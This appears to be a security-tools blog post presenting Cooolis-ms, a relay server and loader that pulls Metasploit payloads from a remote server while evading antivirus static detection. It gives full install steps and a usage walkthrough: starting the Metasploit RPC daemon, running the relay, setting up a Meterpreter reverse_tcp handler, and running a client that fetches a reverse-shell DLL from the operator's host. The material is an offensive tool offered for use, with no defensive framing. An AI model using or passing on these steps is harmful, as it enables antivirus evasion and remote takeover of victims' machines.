Cooolis-MS : A Server That Supports The Metasploit Framework RPC

Cooolis-ms is a server that supports Metasploit Framework RPC. It is used to work for Shellcode and PE loader, bypassing the static detection of anti-virus software to a certain extent, and allows the Cooolis-ms server to perform with the Metasploit server separate.

Loader execution process:

  • connect to Cooolis-Server
  • Cooolis-Server connects to Metasploit RPC server
  • retrieve the payload and send it back to the loader

Advantages of the project

  • small volume (<600KB)
  • Support all Metasploit Payload
  • Simple parameters
  • Single file
  • Support separation

How to install?

  • Choice 1 > Docker deployment (recommend)

Click here for YouTube demo.

$ git clone https://github.com/Rvn0xsy/Cooolis-ms.git
$ cd Cooolis-ms/Docker
$ docker-compose up -d

Default listening port:8899

  • Choice 2 > Source code deployment

$ git clone https://github.com/Rvn0xsy/Cooolis-ms.git
$ cd Cooolis-ms
$ pip3 install -r requirements.txt
$ python3 server.py -h

How to use?

If you are deploying with Docker, please start directly from the third step.

Assuming this is my VPS: 10.20.56.41

  • First step, start Metasploit RPC server
    • Start Metasploit RPC server:

$ msfrpcd -U msf -P msf -u /api/1.0/ -a 127.0.0.1

  • Second step, start the Cooolis-ms server

Make it connect to RPC and listen to a port for sending payload:

$ python3 server.py -U msf -P msf -H 127.0.0.1 -p 55553 -s -v -l 8899 -S 10.20.56.41

  • Third step, configure Metasploit listener

msf5 > use exploit/multi/handler
msf5 > set payload windows/meterpreter/reverse_tcp
msf5 > set LHOST 10.20.56.41
msf5 > set LPORT 8876
msf5 > exploit -j

  • Fourth step, start the Cooolis-ms client

Cooolis-ms.exe -p windows/meterpreter/reverse_tcp -o LHOST=10.20.56.41,LPORT=8876,Format=dll -H 10.20.56.41 -P

Note

  • The -o parameter of Cooolis-ms.exe should correspond to the msf configuration.
  • Since this project relies on the open source project MemoryModule, it can only support PAYLOAD in DLL format. Need to add Format=dll after the -o parameter.
Download
R K

Share
Published by
R K
Tags: Cooolis-MSmetasploitRPC
4 years ago

Recent Posts

garak, LLM Vulnerability Scanner : The Comprehensive Tool For Assessing Language Model Security

garak checks if an LLM can be made to fail in a way we don't…

11 hours ago

Vermilion : Mastering Linux Post-Exploitation For Red Team Success

Vermilion is a simple and lightweight CLI tool designed for rapid collection, and optional exfiltration…

11 hours ago

AD-CS-Forest-Exploiter : Mastering Security Through PowerShell For AD CS Misconfiguration

ADCFFS is a PowerShell script that can be used to exploit the AD CS container…

11 hours ago

Usage Of Tartufo – A Comprehensive Guide To Securing Your Git Repositories

Tartufo will, by default, scan the entire history of a git repository for any text…

11 hours ago

Loco : A Rails-Inspired Framework For Rust Developers

Loco is strongly inspired by Rails. If you know Rails and Rust, you'll feel at…

1 day ago

Monolith : The Ultimate Tool For Storing Entire Web Pages As Single HTML Files

A data hoarder’s dream come true: bundle any web page into a single HTML file.…

1 day ago